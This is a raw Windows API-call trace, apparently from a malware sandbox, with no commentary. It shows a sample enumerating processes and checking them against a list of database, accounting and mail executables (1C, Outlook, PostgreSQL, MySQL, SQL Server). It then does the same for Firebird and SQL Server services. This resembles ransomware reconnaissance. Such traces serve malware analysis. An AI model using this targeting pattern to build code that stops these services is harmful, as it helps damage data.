	[0157.573] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0157.573] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0157.574] lstrlenW (lpString="winlogon.exe") returned 12
	[0157.574] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0157.574] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0157.574] lstrlenW (lpString="services.exe") returned 12
	[0157.574] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0157.574] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0157.574] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0157.575] lstrlenW (lpString="lsass.exe") returned 9
	[0157.575] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0157.575] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0157.575] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0157.575] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0157.575] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0157.575] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0157.575] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0157.575] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0157.575] lstrlenW (lpString="lsm.exe") returned 7
	[0157.575] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0157.575] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0157.575] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0157.575] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0157.575] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0157.575] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0157.575] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0157.575] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0157.576] lstrlenW (lpString="svchost.exe") returned 11
	[0157.576] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0157.576] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0157.576] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0157.576] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0157.576] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0157.576] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0157.576] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0157.576] lstrlenW (lpString="svchost.exe") returned 11
	[0157.576] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0157.577] lstrlenW (lpString="svchost.exe") returned 11
	[0157.577] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0157.577] lstrlenW (lpString="svchost.exe") returned 11
	[0157.577] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0157.577] lstrlenW (lpString="svchost.exe") returned 11
	[0157.577] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0157.578] lstrlenW (lpString="audiodg.exe") returned 11
	[0157.578] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0157.578] lstrlenW (lpString="svchost.exe") returned 11
	[0157.578] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0157.578] lstrlenW (lpString="svchost.exe") returned 11
	[0157.578] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0157.579] lstrlenW (lpString="spoolsv.exe") returned 11
	[0157.579] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0157.579] lstrlenW (lpString="svchost.exe") returned 11
	[0157.579] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0157.579] lstrlenW (lpString="taskhost.exe") returned 12
	[0157.579] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0157.580] lstrlenW (lpString="userinit.exe") returned 12
	[0157.580] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0157.580] lstrlenW (lpString="dwm.exe") returned 7
	[0157.580] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0157.580] lstrlenW (lpString="explorer.exe") returned 12
	[0157.580] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0157.581] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0157.581] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0157.581] lstrlenW (lpString="reader_sl.exe") returned 13
	[0157.581] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0157.581] CloseHandle (hObject=0x3e8) returned 1
	[0157.581] Sleep (dwMilliseconds=0x1f4) 
	[0158.239] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617048
	[0158.274] EnumServicesStatusExW (in: hSCManager=0xb617048, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0158.275] GetLastError () returned 0xea
	[0158.275] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe90) returned 0xb612378
	[0158.275] EnumServicesStatusExW (in: hSCManager=0xb617048, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xe90, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0158.275] CloseServiceHandle (hSCObject=0xb617048) returned 1
	[0158.276] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0158.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0158.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0158.276] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0158.276] lstrlenW (lpString="AudioSrv") returned 8
	[0158.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0158.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0158.276] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0158.276] lstrlenW (lpString="BFE") returned 3
	[0158.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0158.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0158.276] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0158.276] lstrlenW (lpString="CryptSvc") returned 8
	[0158.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0158.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0158.276] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0158.276] lstrlenW (lpString="CscService") returned 10
	[0158.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0158.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0158.276] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0158.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0158.276] lstrlenW (lpString="DcomLaunch") returned 10
	[0158.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0158.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0158.277] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0158.277] lstrlenW (lpString="Dhcp") returned 4
	[0158.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0158.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0158.277] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0158.277] lstrlenW (lpString="Dnscache") returned 8
	[0158.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0158.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0158.277] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0158.277] lstrlenW (lpString="DPS") returned 3
	[0158.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0158.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0158.277] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0158.277] lstrlenW (lpString="eventlog") returned 8
	[0158.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0158.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0158.277] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0158.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0158.277] lstrlenW (lpString="EventSystem") returned 11
	[0158.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0158.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0158.278] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0158.278] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0158.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0158.278] lstrlenW (lpString="gpsvc") returned 5
	[0158.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0158.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0158.278] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0158.278] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0158.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0158.278] lstrlenW (lpString="iphlpsvc") returned 8
	[0158.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0158.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0158.278] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0158.278] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0158.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0158.278] lstrlenW (lpString="LanmanServer") returned 12
	[0158.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0158.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0158.278] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0158.278] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0158.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0158.278] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0158.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0158.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0158.278] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0158.278] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0158.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0158.279] lstrlenW (lpString="lmhosts") returned 7
	[0158.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0158.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0158.279] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0158.279] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0158.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0158.279] lstrlenW (lpString="MMCSS") returned 5
	[0158.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0158.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0158.279] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0158.279] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0158.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0158.279] lstrlenW (lpString="MpsSvc") returned 6
	[0158.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0158.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0158.279] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0158.279] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0158.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0158.279] lstrlenW (lpString="NlaSvc") returned 6
	[0158.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0158.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0158.279] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0158.279] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0158.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0158.279] lstrlenW (lpString="nsi") returned 3
	[0158.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0158.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0158.279] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0158.279] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0158.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0158.280] lstrlenW (lpString="PcaSvc") returned 6
	[0158.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0158.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0158.280] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0158.280] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0158.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0158.280] lstrlenW (lpString="PlugPlay") returned 8
	[0158.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0158.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0158.280] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0158.280] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0158.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0158.280] lstrlenW (lpString="Power") returned 5
	[0158.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0158.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0158.280] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0158.280] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0158.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0158.280] lstrlenW (lpString="ProfSvc") returned 7
	[0158.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0158.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0158.280] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0158.280] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0158.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0158.280] lstrlenW (lpString="RpcEptMapper") returned 12
	[0158.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0158.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0158.281] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0158.281] lstrlenW (lpString="RpcSs") returned 5
	[0158.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0158.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0158.281] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0158.281] lstrlenW (lpString="SamSs") returned 5
	[0158.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0158.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0158.281] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0158.281] lstrlenW (lpString="Schedule") returned 8
	[0158.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0158.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0158.281] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0158.281] lstrlenW (lpString="SENS") returned 4
	[0158.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0158.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0158.281] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0158.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0158.281] lstrlenW (lpString="ShellHWDetection") returned 16
	[0158.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0158.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0158.282] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0158.282] lstrlenW (lpString="Spooler") returned 7
	[0158.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
